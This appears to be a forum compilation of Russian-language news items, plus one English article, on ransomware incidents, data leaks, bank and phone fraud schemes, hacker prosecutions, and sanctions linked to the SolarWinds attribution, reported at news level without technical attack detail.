По общему мнению, FTX и Аламеда «восстановлению не подлежат». Ни одному инвестору, если он в своем уме, не придет в голову спасать эти абсолютно дотла сгоревшие проекты. Но Аламеда являлась крупнейшим венчурным фондом в крипто- пространстве, во всяком случае, была в первой тройке. Что ожидает проекты, получавшие инвестиции от FTX и Alameda Research?
Банкротиться собирается BlockFi. Уже приостановили ввод и вывод средств платформы Digital Surge и Salt. Кредитное подразделение криптоинвестора Genesis Global Trading временно не выдает новых кредитов. Как минимум 6 фондов потерпели серьезные убытки из-за банкротства FTX.
CZ сравнил сегодняшнюю ситуацию с мощным финансовым кризисом, случившимся в 2008, (тогда обанкротилось множество банков). Но он выражает надежду, что крипторынок сможет в итоге «исцелить сам себя». Сейчас Binance занимается фондом для восстановления отрасли для помощи сильным проектам, испытывающим кризис ликвидности. Но объём фонда слишком мал, чтобы помочь абсолютно всем.
За атакой стоит печально известная группировка LockBit 3.0.
На прошлой неделе администрация округа Саутгемптон (штат Вирджиния) начала
информировать жителей о том, что их личная информация могла быть
скомпрометирована в результате атаки кибервымогателей. Об инциденте стало
известно в сентябре, тогда хакеры получили доступ к серверу с данными о
жителях округа и зашифровали хранящиеся на нем данные.
Администрация Саутгемптона заявила, что сразу после обнаружения кибератаки IT-
команда приняла меры по ее локализации и начала расследование, чтобы
определить тип скомпрометированных данных. Расследование показало, что в руки
злоумышленников попали имена, адреса, номера водительских прав и номера
социального страхования жителей округа. В письме говорится, что у
администрации нет точной информации о том, смогли ли злоумышленники удалить
личную информацию жителей с сервера, но есть точное подтверждение того, что
киберпреступники разместили некоторую информацию в Интернете.
Известно, что за атакой на округ стоит группировка LockBit 3.0, которая
похвасталась этим на своем сайте. Правда в качестве подтверждения своих слов
злоумышленники предоставили лишь несколько скриншотов, на которых были
названия папок с данными жителей Саутгемптона. За удаление всей информации или
загрузку всего украденного LockBit требует $90 000.
Жительнице американского Рочестера (штат Иллинойс) предъявлены спустя три года после начала расследования предъявлены обвинения в мошенничестве с кредитными картами. Телеканал ABC News 6 уточняет, что в марте 2020 года при обыске в гостиничном номере Кэсси Мэй Каллен (Cassie Mae Cullen), которой сейчас 50 лет, нашли документы, связанные как минимум с 200 людьми.
Согласно судебным документам, после задержания женщина призналась, что она залезала в мусорные баки, чтобы найти документы с финансовыми и персональными данными людей и организаций. Эти сведения она в дальнейшем использовала для подачи заявок на кредитные и дебетовые карты.
При обыске у нее изъяли карточки EBT и Mastercard, членские карты различных компаний (в том числе авиакомпаний), удостоверения личности, номера социального страхования, а также 76 чеков, выписанных другим физическим и юридическим лицам на общую сумму в 56 тысяч долларов. При этом в материалах следствия не указана причина столь длительного расследования в отношении Каллен. Женщина провела все это время на свободе, внеся залог.
source: kaaltv.com/news/illinois-woman-charged-3-years-after-discovery-of- more-than-200-identity-theft-attempts
Американские власти официально возложили на Россию ответственность за атаку на компанию SolarWinds и ее клиентов. Администрация Джо Байдена заявляет, что за атакой стояла Служба внешней разведки России и ее «правительственные хакеры», известные как APT 29, Cozy Bear или The Dukes. По данным властей, они «использовали платформу SolarWinds Orion и другие ИТ-инфраструктуры в рамках широкомасштабной кибершпионской кампании».
«Компрометация СВР цепочки поставок SolarWinds дала им возможность шпионить и потенциально нарушать работу более чем 16 000 компьютерных систем по всему миру», — гласит заявление Белого дома.
Click to expand...
Правительство Великобритании поддержало заявление Белого дома и тоже связывает атаку на SolarWinds с СВР. Европейская комиссия тоже подготовила собственное заявление, в котором так же обвиняет Россию, однако не утверждает, что за этим инцидентом стояла Служба внешней разведки.
Взлом SolarWinds стал одной из наиболее масштабных атак на цепочку поставок в
истории.
В декабре 2020 года стало известно, что неизвестные злоумышленники атаковали
компанию SolarWinds и заразили ее платформу Orion малварью.
Согласно официальным данным, среди 300 000 клиентов SolarWinds только 33 000
использовали Orion, а зараженная версия платформы была установлена примерно у
18 000 клиентов. В результате среди пострадавших оказались такие гиганты, как
Microsoft, Cisco, FireEye, а также множество правительственных агентств США,
включая Госдеп, Министерство юстиции и Национальное управление по ядерной
безопасности.
В этот же день Министерство финансов США ввело санкции против шести российских ИТ-компаний, которые, по мнению правительства США, помогали СВР и ГРУ своими техническими знаниями и услугами во время прошлых операций. Санкции коснулись Технополис «Эра», АО «Пасит», Федерального государственного автономного научного учреждения «Научно-исследовательский институт специализированных вычислительных устройств и автоматики безопасности», ООО «Необит», АО «Передовые системные технологии», а также АО «Позитив Текнолоджиз». Помимо них под санкции попали информационные агентства Southfront, «Ньюсфронт», «Инфорос» и фонд стратегической культуры России.
В частности, американский Минфин заявляет, что Positive Technologies имеет клиентов в правительстве России, включая ФСБ, а также регулярно проводит крупномасштабные конвенции, где ФСБ и ГРУ вербуют для себя новых сотрудников.
Представители Positive Technologies уже опубликовали [официальный ответ](https://www.ptsecurity.com/ru-ru/about/news/oficialnoe-zayavlenie- positive-technologies-po-sankciyam-ssha/), в котором отвергают все выдвинутые американскими властями обвинения. Ниже можно увидеть полную версию заявления компании.
«Мы, как компания, отвергаем безосновательные обвинения, выдвинутые в наш адрес министерством финансов США: за почти двадцатилетнюю историю нашей работы нет ни одного факта использования результатов исследовательской деятельности Positive Technologies вне традиций этичного обмена информацией с профессиональным ИБ-сообществом и прозрачного ведения бизнеса.
Наша глобальная цель состоит в создании продуктов и технологий, призванных повышать общую киберзащищенность в масштабах всего мира, а также ― в формировании условий для наиболее эффективного противодействия кибератакам в интересах общества, бизнеса и государства вне привязки к геополитике, с максимальной открытостью и ориентированностью на сотрудничество (в том числе международное).
Технологии Positive Technologies используются по всему миру, и сегодня нам доверяют свою безопасность тысячи компаний различных секторов бизнеса и государственные учреждения разных стран. В компании более 1100 сотрудников, по итогам 2020 года мы заработали 5,6 млрд рублей ($73 млн, по РСБУ) и выросли на 55% по отношению к 2019 году. За последние пять лет средний рост компании составил 41%. Независимые международные аналитические агентства неоднократно отмечали нас в числе наиболее быстрорастущих и визионерских компаний в области решений по безопасности и управлению уязвимостями.
Несмотря на то, что компания не является публичной, рынок высоко оценивает нашу капитализацию — в несколько миллиардов долларов. Это доказывает высокий интерес к нашим технологиям и серьезный уровень доверия к компании. Для поддержания этого доверия мы придерживаемся принципов максимальной открытости на всех уровнях своей деятельности: от исследовательской до коммерческой, включая финансовую отчетность компании.
Мы известны мировому кибербез-сообществу как визионеры и лидеры в области этичного исследования проблем безопасности. Так, к примеру, наши исследователи выявляют сотни уязвимостей нулевого дня в год в IT-системах различных классов и типов. Все найденные уязвимости без исключения предоставляются производителям ПО в рамках политики ответственного разглашения (responsible disclosure) и не подвергаются огласке до тех пор, пока ими не будет выпущено соответствующее обновление. Каждое такое исследование получает высокую оценку со стороны производителей этих систем и используется для повышения защищенности их конечного продукта.
Традиции прозрачности и открытости находят свое отражение и в рамках форума Positive Hack Days, который мы проводим с 2011 года. Форум является публичной площадкой для обмена экспертизой, обучения и повышения квалификации в области кибербезопасности и ежегодно собирает тысячи экспертов в области кибербезопасности и бизнеса разных стран, представителей CTF-движения, ученых, студентов и даже школьников. В связи с пандемией мы перешли в гибридный формат, и поэтому все происходящее на форуме может видеть широкая аудитория в онлайне, где мы обеспечиваем синхронный перевод на английский язык для того, чтобы любой желающий из любой точки мира мог посмотреть интересную ему тему. Мероприятие полностью открыто для посещения и участия.
Мы искренне считаем, что геополитика не должна являться преградой технологическому развитию общества, и со своей стороны продолжим делать то, что у нас хорошо получается ― обеспечивать кибербезопасность и повышать киберзащищенность во всем мире. Поэтому мы продолжаем свою работу в штатном режиме с полным соблюдением всех обязательств перед нашими клиентами, партнерами и сотрудниками».Click to expand...
Источник: xakep.ru/2021/04/16/pt-sanctioned/
Следственным управлением УСК по городу Минску расследуется уголовное дело, возбужденное по факту мошенничества в крупном размере. Об этом сообщил журналистам начальник отдела по расследованию преступлений против информационной безопасности и незаконного оборота наркотиков следственного управления УСК по Минску Дмитрий Острейко, передает корреспондент БЕЛТА.
"В одном производстве соединено более 100 уголовных дел, и в настоящее время для рассмотрения вопроса о соединении изучается еще более 30. По ориентировочным оценкам, количество уголовных дел, которые в последующем могут быть соединены в одном производстве, может достигнуть 1 тыс. и более", - рассказал Дмитрий Острейко.
По материалам уголовного дела, неустановленные лица организовали так называемые call-центры, представители которых, обладая сведениями об абонентских номерах мобильных телефонов и иными персональными данными граждан Беларуси, на протяжении более года осуществляли телефонные звонки посредством виртуальных номеров зарубежных операторов связи либо посредством мессенджера Viber.
В своей преступной деятельности неизвестные используют самый распространенный в последний год способ обмана граждан. При общении они представляются сотрудниками банков нашей страны и сообщают ложную информацию о совершаемом хищении с банковских счетов. Затем звонящие предлагают гражданам для предотвращения несанкционированных операций либо сообщить реквизиты своих карт, либо перевести денежные средства со своего счета на предоставленный ими, либо предоставить доступ к системе дистанционного банковского обслуживания счетом и сообщить коды, приходящие на телефон, а иногда и установить на смартфон специальное приложение для удаленного администрирования.
При этом, завладев необходимыми сведениями, злоумышленники получают возможность похищать денежные средства путем осуществления оплаты товаров в различных интернет-магазинах, переводов денежных средств на контролируемые ими счета и платежные карты, зарегистрированные на имя подставных физических лиц - дропов.
После этого под руководством организаторов преступной схемы и дроповодов денежные средства, как правило, получают в наличной форме в банкоматах Беларуси так называемые обнальщики, которыми могут являться как сами дропы, так и дроповоды. Затем за вычетом процента от суммы полученных денежных средств (как правило от 2 до 10%) деньги передаются представителям так называемых битов - лиц, которые осуществляют обмен денежных средств на криптовалюту и последующий ее перевод на электронные кошельки организаторов.
Благодаря слаженной и кропотливой работе правоохранителей весной этого года удалось задержать более 20 лиц, причастных к вышеуказанной преступной схеме. Ими оказались молодые люди в возрасте от 18 до 32 лет. Среди них два гражданина Таджикистана, один гражданин Грузии, остальные - белорусы. Почти все нигде не работают и не учатся. Задержанные выполняли роль дропов, дроповодов и обнальщиков.
В настоящее время 15 лицам предъявлено обвинение по ч.4 ст.212 (хищение путем использования компьютерной техники, совершенное в особо крупном размере) и ч.4 ст.209 (мошенничество, совершенное в особо крупном размере) УК Беларуси. К ним применена мера пресечения в виде заключения под стражу. В статусе подозреваемых остаются еще 8 человек.
По уголовному делу признаны потерпевшими более 100 граждан, которым причинен ущерб на общую сумму более Br1 млн. Так, в некоторых эпизодах сумма ущерба варьировалась от Br9 тыс. до $200 тыс.
"С рядом граждан из задержанных заключены досудебные соглашения о сотрудничестве. Расследование с ними идет в активной фазе", - добавил Дмитрий Острейко.
Как добавил заместитель начальника главного управления по противодействию киберпреступности Министерства внутренних дел Владимир Зайцев, раскрытие данного преступления началось с факта, когда у жительницы Минска были похищены денежные средства в общей сумме более $200 тыс.
"Подобные криминальные структуры довольно мобильны, и участники могут порой друг друга не знать. Но в данном случае задержанные между собой общались, взаимодействовали в криминальных целях. И что примечательно - очень часто вырастали от простого дропа до дроповода, обнальщика и в дальнейшем лица, которое непосредственно занималось обменом криптовалют. То есть фактически легализацией денежных средств, добытых преступным путем, - рассказал замначальника. - Похищенные денежные средства злоумышленники использовали для развлечений - приобретения спиртных напитков, посещения ночных клубов и так далее".
Следственным управлением УСК по Минску при взаимодействии с главным управлением по противодействию киберпреступности МВД проводятся необходимые следственные действия и оперативно-разыскные мероприятия, направленные на установление и привлечение к ответственности всех лиц, причастных к указанной преступной деятельности, установление всех эпизодов данной деятельности, обнаружение и изъятие имущества, добытого преступным путем.
Российская хакерская группа Killnet потребовала освобождения хакера и пригрозила отключить аппараты ИВЛ, если требования не будут выполнены.
Связь группировки с российским правительством не доказана, однако, шпионские агентства альянса Five Eyes, (Австралия, Канада, Новая Зеландия, Великобритания, США) связывают Killnet и действия команды с интересами России.
«Если он не будет освобожден в течение 48 часов, я уничтожу Румынию, Великобританию и Молдову»,- предупредила группа Killnet в Telegram.
«Я уничтожу всю вашу информационную структуру и даже Министерство здравоохранения. Все аппараты ИВЛ будут отключены», - добавлено в сообщении.
Подозреваемый хакер являлся сторонником спецоперации России на Украине. Он публиковал в соцсетях российские флаги и символ Z. Киберпреступник подозревался в провокациях атак Killnet на румынскую инфраструктуру. Группа нацелилась на румынское правительство и СМИ из-за их поддержки Украины. Сообщается, что хакер был арестован сотрудниками Национального агентства по борьбе с преступностью (National Crime Agency, NCA) и официальными лицами Румынии. Арестованный хакер уже освобожден в рамках расследования.
В сотрудничестве с NCA Великобритания с помощью надежных средств киберзащиты примет меры реагирования на любой киберинцидент, способный оказать влияние на государство.
Агентства кибербезопасности Five Eyes призвали тех, кто работает с критически важной инфраструктурой, «подготовиться к потенциальным киберугрозам и смягчить их последствия».
Сообщается, что связанные с Россией группы киберпреступников нацелились на критически важные ИТ-системы, службы здравоохранения, атомную электростанцию, аэропорт и правительственные сети.
Ранее сообщалось, что группировка Killnet проводила DDoS-атаки на правительства Молдавии и Румынии из-за их поддержки Украины в спецоперации.
source: dailymail.co.uk/news/article-10787595/Sinister-Russian-hacking-group- threatens-shut-hospital-ventilators-Britain.html
Несмотря на все свои недостатки, инструмент позволяет восстановить самые ценные файлы без уплаты выкупа.
Специалисты Security Research Labs (SRLabs) создали дешифратор, который использует уязвимость в алгоритме шифрования программы-вымогателя Black Basta и позволяет жертвам бесплатно восстанавливать свои файлы.
Особенностью дешифратора Black Basta Buster является его способность восстанавливать файлы, зашифрованные с ноября 2022 года по настоящее время. Однако разработчики Black Basta уже устранили эту уязвимость примерно неделю назад, что делает невозможным использование данной техники дешифрования в более новых атаках.
Суть уязвимости заключается в использовании стандартного шифра XChaCha20 для шифрования файлов. Ошибка разработчиков Black Basta состояла в повторном использовании одного и тот же потока ключей во время шифрования, в результате чего все 64-байтовые фрагменты данных, содержащие только нули, были преобразованы в 64-байтовый симметричный ключ, что позволило специалистам извлечь ключ и использовать его для расшифровки всего файла.
Дешифратор Black Basta Buster состоит из набора скриптов на Python, которые помогают в расшифровки файлов в различных сценариях. Однако, важно отметить, что дешифратор работает только с файлами, зашифрованными версиями Black Basta с ноября 2022 года и до недавнего времени. Кроме того, версии программы, которые добавляли расширение «.basta» к зашифрованным файлам, не поддаются дешифровке с помощью инструмента.
Эффективность Black Basta Buster официально подтверждена, но, несмотря на успех в восстановлении некоторых файлов, дешифратор работает только с одним файлом за раз, что затрудняет процесс восстановления для большого количества данных.
Файлы могут быть восстановлены, если известен открытый текст из 64 зашифрованных байтов. Возможность полного или частичного восстановления файла зависит от его размера. Файлы размером менее 5 000 байт не могут быть восстановлены. Для файлов размером от 5 000 байт до 1 ГБ возможно полное восстановление. Для файлов размером более 1 ГБ первые 5 000 байт будут потеряны, но остальные можно восстановить.
Хотя расшифровка файлов меньшего размера может быть невозможна, файлы большего размера, например, диски виртуальных машин, обычно можно расшифровать, поскольку они содержат большое количество «нулевых» разделов.
Открытие становится особенно важным для жертв вымогательского ПО, которые ранее не имели возможности восстановить свои данные без уплаты выкупа. Теперь у них появился шанс на восстановление ценных файлов без финансовых потерь.
sc: github.com/srlabs/black-basta-buster
После отзыва в феврале лицензии у Киви Банка, печально известного высокорисковыми операциями по расчетам между гражданами и теневым бизнесом, злоумышленники стали искать альтернативу Qiwi-кошелькам. В частности, одним из вариантов для них становятся аналоги от Ozon: по данным Angara Security, количество сообщений о покупке и продаже верифицированных электронных кошельков Ozon для p2p-переводов с февраля выросло в три раза. Аналитики также фиксируют рост объявлений об их использовании для нелегальных операций, в том числе для незаконного вывода средств и снятия их за процент
В поисках альтернативы
По данным Angara Security, с которыми ознакомился Forbes, количество сообщений о купле-продаже верифицированных электронных кошельков Ozon для p2p-переводов в 2024 году выросло в три раза. На момент проведения исследования (конец апреля) аналитики зафиксировали существенный прирост сообщений, поясняют в Angara Security, не конкретизируя их число. В наличии в Сети таких объявлений убедился и Forbes.
По времени этот прирост совпадает с моментом решения ЦБ лишить Киви Банк, известный, в частности, как оператор электронных Qiwi-кошельков, права заниматься банковской деятельностью. В числе основных претензий, которые высказывал ЦБ в адрес банка, были высокорисковые операции по расчетам между гражданами и теневым бизнесом. Речь идет о переводах денег криптообменникам, нелегальным онлайн-казино и букмекерским конторам, а также о переводах похищенных средств так называемым дроперам — физическим лицам, принимающим на свои или чужие счета и карты незаконно выведенные средства и снимающим их в интересах преступников за процент. ЦБ упоминал о многочисленных прецедентах открытия электронных кошельков с использованием персональных данных физлиц без их ведома и проведения по этим кошелькам операций без согласия клиентов.
Лишившись популярного инструмента, злоумышленники стали обращать внимание на аналогичные продукты. Так, помимо объявлений о купле-продаже кошельков Ozon, аналитики Angara Security фиксируют и факты продажи личных кабинетов Ozon Банка с максимальными статусами верификации, а также предложения услуг по прямому переводу средств с «украденных личных кабинетов на другие карты для дальнейшего обналичивания».
При этом одной из основных площадок для распространения подобных сообщений в последнее время стал Telegram, указывают в компании. «Безусловно, часть данных публикуется в даркнете, но основной массив информации в данном случае собран с помощью инструментов OSINT (Open source intelligence, разведка по открытым источникам), которые позволяют мониторить и анализировать сообщения в группах и чатах, а также так называемый малвертайзинг — продвижение контента от злоумышленников с помощью рекламных инструментов платформы», — поясняют в Angara Security. Forbes направил запрос в Telegram.
Мошенники предлагают три основных способа приобретения электронных кошельков, обращают внимание в Angara Security. В первую очередь это покупка базы с данными легитимных пользователей, что, по мнению экспертов, «создает риски для действующих клиентов сервисов Ozon». Во-вторых, злоумышленники пользуются возможностями самого сервиса, который позволяет привязывать цифровые карты к анонимному счету, для регистрации которого достаточно сим-карты мобильного оператора. Третий способ — предложения о покупке электронных кошельков в Telegram и даркнете. Например, электронный кошелек Ozon Банка можно приобрести за 2599 рублей.
«Финансовые сервисы крупнейших российских маркетплейсов, изначально разработанные для целей «бесшовного» клиентского опыта, становятся объектами внимания участников серого рынка платежей. Расчеты с помощью электронных кошельков предоставляют больше возможностей для трансакций, вовлечения большего числа участников в нелегальные схемы — от обналичивания средств до финансирования нежелательных организаций», — предостерегают эксперты Angara Security.
«Отличная замена»
Мониторинг активности в дарквебе показывает, что за февраль 2024 года количество объявлений о продаже аккаунтов Ozon Банка увеличилось вдвое по сравнению с январем, сообщил источник в крупной компании, занимающейся кибербезопасностью. «В марте и апреле наблюдается небольшое, на 10-15%, снижение количества объявлений. Но в ряде случаев продавцы позиционируют кошельки Ozon Банка как отличную замену Qiwi-кошельков. Чаще всего такие аккаунты имеют заниженную стоимость, что привлекает покупателей», — продолжает он.
В середине 2023 года стоимость доступов к личному кабинету Ozon Банка в даркнете составляла 700-2500 рублей, сейчас же она варьируется в диапазоне 500-10 000 рублей и зависит от нескольких факторов, делится наблюдениями собеседник Forbes. «Это статус кошелька (анонимный, базовый, расширенный), метод верификации (через «Госуслуги», с использованием фото паспорта или через мобильного оператора), вероятность блокировки аккаунта (зависит от времени с момента регистрации и были ли в этот момент какие-либо трансакции), а также данные, получаемые покупателем (минимальный набор — номер телефона для Ozon Банка, логин и пароль от сервиса по приему смс; максимальный набор — номер телефона, кодовое слово, секретный код, паспортные данные, прокси для Ozon Банка, логин и пароль от сервиса по приему смс)», — перечисляет он.
Впрочем, по словам другого источника в крупной ИБ-компании, в даркнете
продаются верифицированные кошельки всех платежных сервисов, а их количество
«напрямую зависит от популярности у населения».
Передача на подставного
Как рассказали Forbes в Ozon, для выявления мошеннической активности в банке выстроен многоуровневый процесс фрод-анализа, который использует специальные выявляющие алгоритмы, машинное обучение и ряд других технологий. «Если система фиксирует любую подозрительную активность, то команда фрод-мониторинга оперативно блокирует движение средств и проводит проверку таких случаев, которая может включать в том числе и дополнительную идентификацию, а также в некоторых случаях подтверждение источника средств, — говорит представитель компании. — При этом борьба с фродом — непрерывный процесс. Мошенники постоянно изобретают новые схемы, поэтому и мы постоянно работаем над улучшением собственных правил и инструментария борьбы с фродом». Ozon также активно взаимодействует с регуляторами и другими участниками рынка, это также позволяет успешно бороться с системной мошеннической активностью, заключают в компании.
В начале года во время отзыва лицензии у «популярного сервиса электронных кошельков» количество переводов на банковские карты подставных лиц (дроперов) выросло примерно на 50% относительно среднесуточного количества, констатируют в департаменте Fraud Protection компании F.A.C.C.T.: «И примерно на столько же в объявлениях на теневых ресурсах увеличилась стоимость заказа банковских карт, оформленных на дроперов».
«Борьба с дропами — серьезный вызов для всего банковского сообщества, с ним сталкиваются абсолютно все игроки. В даркнете можно встретить предложение о покупке карт или скомпилированных баз из общедоступной информации любого крупного банка. После отзыва лицензии у «популярного сервиса электронных кошельков» ведущие российские банки и платежные системы усилили защиту своих систем для того, чтобы не допустить взрывного роста количества используемых дропов. Насколько нам известно, Ozon Банк также усилил меры по фрод- мониторингу в этом направлении», — резюмируют в F.A.C.C.T.
Мошенническую схему разоблачили сотрудники управления противодействия киберпреступлениям в Харьковской области совместно со следственным отделом Харьковского районного управления полиции.
Организовал деятельность call-центра 25-летний местный житель совместно с двумя администраторами. Фигуранты привлекли к работе операторов, для которых разработали детальные инструкции мошеннических действий. Также организатор на хакерских форумах покупал базы данных клиентов банков, которым звонили работники call-центра под видом работников финучреждения.
Гражданам сообщали, что с их банковской карты якобы осуществляются подозрительные транзакции или о том, что поступила заявка на смену финансового номера. Далее граждан переключали на других работников call-центра, которые сообщали "детали" о "ситуации с банковским счетом". Операторы также уверяли пострадавших, что информация о якобы мошеннических действиях будет передана в местную полицию.
После этого другой работник call-центра звонил уже под видом полицейского. Для убеждения потерпевших злоумышленники использовали "sip-телефонию" и подменяли номера на те, что были указаны на официальных сайтах полиции. Псевдополицейский сообщал, что для блокирования мошеннических действий необходимо назвать ему код из SMS-сообщения. Как только граждане называли код
По местам жительства фигурантов и в офисном помещении, где располагался сall- центр, работники полиции провели обыски. Изъято более 70 компьютеров и такое же количество телефонов. Обыски проводились с привлечением сотрудников полка полиции особого назначения полиции Харьковщины. Сейчас правоохранители устанавливают потерпевших и окончательную сумму ущерба.
Открыто уголовное производство по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы. Решается вопрос об объявлении подозрения фигурантам. Следственные действия продолжаются. Процессуальное руководство осуществляет Харьковская окружная прокуратура.
FujiFilm is investigating a ransomware attack and has shut down portions of its network to prevent the attack's spread.
FujiFilm, also known as just Fuji, is a Japanese multinational conglomerate headquartered in Tokyo, Japan, which initially started in optical film and cameras. It has grown to include pharmaceuticals, storage devices, photocopiers and printers (XEROX), and digital cameras.
Today, FUJIFILM announced that their Tokyo headquarters suffered a cyberattack Tuesday night that they indicate is a ransomware attack.
"FUJIFILM Corporation is currently carrying out an investigation into possible unauthorized access to its server from outside of the company. As part of this investigation, the network is partially shut down and disconnected from external correspondence," FUJIFILM said in a statement.
"We want to state what we understand as of now and the measures that the company has taken. In the late evening of June 1, 2021, we became aware of the possibility of a ransomware attack. As a result, we have taken measures to suspend all affected systems in coordination with our various global entities."
"We are currently working to determine the extent and the scale of the issue. We sincerely apologize to our customers and business partners for the inconvenience this has caused."
Due to the partial network outage, FUJIFILM USA has added an alert to the top of their website stating that they are experiencing network problems that are impacting their email and phone systems.
Alert about
cyberattack on FUJIFILM USA website
While FUJIFILM has not stated what ransomware group is responsible for the
attack, Advanced Intel CEO Vitali Kremez has
told BleepingComputer that FUJIFILM was infected with the Qbot trojan last
month.
"Based on our unique threat prevention platform Andariel, FUJIFILM Corporate appeared to be infected with Qbot malware based on May 15, 2021," Kremez told bleepingcomputer[.] "Since the underground ransomware turmoil, the Qbot malware group currently works with the REvil ransomware group."
"A network infection attributed to QBot automatically results in risks associated with future ransomware attacks."
The operators of the Qbot trojan have a long history of working with ransomware operations to provide remote access to compromised networks.
In the past, the ProLock and Egregor ransomware gangs partnered with Qbot, but with the shutdown of those operations, the REvil ransomware operation has been utilizing the botnet.
While ransomware has been active since 2012, it has recently gained worldwide attention after the attacks on Colonial Pipeline, the US's largest fuel pipeline, and the world's largest beef producer, JBS.
The US government has created a ransomware task force to recommend new policies and guidelines for battling the growing threat.
Хакеры выложили в открытый доступ более 800 тыс. файлов, полученных, по их словам, с сервера косметической компании «Oriflame».
В свободном доступе оказались сканы документов граждан Грузии (более 25 тыс.) и Казахстана (более 700 тыс.) в формате JPG.
Всего у хакеров более 13 млн. файлов общим размером около 4 Тб, содержащих копии документов граждан различных стран (включая Россию, Украину, Великобританию, Китай, Испанию и др.). ?
В следующий раз хакеры обещают выложить файлы со сканами российских документов (более 800 тыс.).
Все обвинения сняты, но вряд ли киберпреступнику станет от этого легче.
Парижский суд оправдал знаменитого улыбающегося хакера из Алжира Хамзу Бенделладжа, известного за взлом 217 банков по всему миру. Долгое время преступник обвинялся в вымогательстве и шантаже с использованием вредоносной программы PyLocky.
Причиной оправдательного приговора стала юридическая ошибка прокуратуры, которая в обвинительном заключении упомянула несуществующий вирус «JobCrypter». Суд посчитал, что упоминание в документе вируса, не имеющего отношения к делу Бенделладжа, является существенным нарушением, лишающим обвиняемого права знать, в чем его обвиняют.
Эксперты отмечают, что ошибка носила скорее технический характер, однако суд посчитал иначе. Упоминание неверного вируса поставило под сомнение все остальные обвинения и лишило суд возможности рассмотреть дело по существу, отчего и был вынесен оправдательный приговор.
Прокуратура пока не объявила о намерении обжаловать решение суда, но вряд ли это вообще имеет какой-то смысл. Ведь ранее Бенделладж уже был приговорён к 15 годам тюрьмы в США за участие в создании банковского трояна SpyEye. В настоящий момент хакер всё ещё находится там.
Лишь в 2018 году мужчину дополнительно обвинили и во Франции, связав с крупной вымогательской операцией, в которой хакер неоднократно использовал шифровальщик PyLocky. Операция затронула множество французских компаний и солидно потрепала их репутацию. Чем закончилась пятилетняя история обвинения — мы уже знаем.
Тем не менее, решение французского суда всё равно стало сенсацией в мире кибербезопасности, так как, фактически, одного из самых известных хакеров последних лет не удалось привлечь к ответственности из-за небольшой ошибки прокуратуры.
Сам Бенделладж, который участвовал в судебном заседании по видеосвязи, назвал решение суда «победой справедливости». Его адвокаты также приветствовали вердикт, отметив, что их доводы о нарушении прав подзащитного были услышаны.
Однако вряд ли хакеру стало легче из-за решения парижского суда. Ведь оно не отменяет того факта, что Бенделладж ещё много лет проведёт за решёткой американской тюрьмы.
Эта история демонстрирует, что даже очевидная вина обвиняемого не избавляет прокуратуру от необходимости тщательно готовить обвинительное заключение. Небрежность и ошибки в документах могут привести к оправданию преступника, несмотря на совершенные им противозаконные деяния.
source: zdnet.fr/actualites/apres-une-bourde-juridique-hamza-bendelladj- relaxe-39961076.htm
Российские хакеры становятся все более наглыми при осуществлении своих атак. На это пожаловался глава отдела по борьбе с киберпреступностью Федерального бюро расследований (ФБР) США Брайан Вондран, занимающийся также расследованием криптовалютных преступлений.
«Это проблема для мировой экономики, для экономики США и для безопасности Соединенных Штатов. По нашим оценкам, глобальные потери превышают миллиард долларов в год», — отметил Вондран.
Он добавил, что считает ответственной за последние атаки вымогателей группировку Scattered Spider, связанную, как это считается на Западе, с Министерством обороны России. В Вашингтоне ее называют «сплоченной сетью хакеров», говорящих на английском языке, ответственных за десятки взломов, в том числе казино. Основным инструментарием группировки называется социальная инженерия. При этом, по мнению ИБ-журналиста Джона ДиМаджио, это объединение вряд ли будет наказано.
«Пока они не нацелены на находящиеся в России организации, они не подвергнутся судебному преследованию. Это не считается преступлением. Это безумие, правда? Но вот, как это работает», — заявил ДиМарджио.
Click to expand...
С ним согласился экс-директор АНБ по кибербезопасности Роб Джойс, отметивший, что атака REvil на Colonial Pipeline «заставила сделать шаг назад и решить, что нам нужно вложить больше ресурсов в борьбу с этой внешней угрозой». Он добавил, что в январе 2022 года один из исполнителей этой атаки был идентифицирован и задержан в России, как и его сообщники.
«После вторжения в Украину этих людей выпустили из тюрьмы. Они снова в деле», — заключил Джойс.
Click to expand...
sc: cbsnews.com/news/cybersecurity-investigators-worry-ransomware-attacks-may- worsen-as-young-hackers-in-us-work-with-russians-60-minutes-transcript
Первоначальная сумма выкупа составляла $7,48 млн, однако жертве удалось договориться с вымогателями о снижении суммы.
Компания ExaGrid, специализирующаяся на устройствах резервного копирования, пострадала от кибератаки с использованием вымогательского ПО Conti в мае нынешнего года. Киберпреступники получили доступ к данным сотрудников и клиентов, а также конфиденциальные контракты. Теперь стало известно, что 13 мая нынешнего года ExaGrid заплатила выкуп в размере 50,75 биткойнов (примерно $2,6 млн) киберпреступникам. Об этом сообщил ресурс LeMagIT.
Переговоры между вымогателями и компанией начались 4 мая.
«Как вы уже знаете, мы проникли в вашу сеть и оставались в ней более месяца (достаточно, чтобы изучить всю вашу документацию), зашифровали ваши файловые серверы, SQL-серверы, похитили всю важную информация общим объемом более 800 ГБ», — заявили хакеры.
Злоумышленники также предположительно похитили личные данные клиентов и сотрудников компании, коммерческие контракты, соглашения о неразглашении, финансовые данные, налоговые декларации и пр. Первоначальный выкуп составлял $7,48 млн.
ExaGrid хотела протестировать расшифровку на тестовом образце и переговоры продлились до 13 мая. Вскоре компания предложила выплатить чуть более $1 млн, но хакеры лишь снизили сумму выкупа на $1 млн.
«Мы понимаем, что ваша работа непростая и требует некоторых усилий, чтобы убедить членов вашего совета. Но мы все еще далеки от согласия», — сообщил хакер переговорщику со стороны ExaGrid.
Неделю спустя переговорщик ExaGrid повысил свое предложение до $2,2 млн, а киберпреступники снизили сумму выкупа до $3 млн. Вскоре стороны сошлись на сумме в $2,6 млн. Инструмент дешифрования был предоставлен через учетную запись на Mega.nz, где хранились украденные данные. Похищенные сведения были немедленно удалены.
Но затем, два дня спустя, переговорщик ExaGrid попросил снова отправить инструмент дешифрования, потому что «специалисты случайно удалили его». Киберпреступники сделали его доступным для скачивания на следующий день.
При разборе августовских атак шифровальщика BlackCat/ALPHV эксперты Symantec (те, что ушли под крыло Broadcom) обнаружили новый, более скрытный вариант инструмента эксфильтрации данных Exmatter. Наблюдатели также отметили случай использования дополнительного зловреда — инфостилера Eamfo, умеющего воровать учетные данные, сохраненные с помощью Veeam.
Кросс-платформенного вредоноса BlackCat, которого в Symantec называют Noberus, многие считают преемником BlackMatter и Darkside. Операторы шифровальщика постоянно обновляют свои техники и тактики, стараясь повысить эффективность атак.
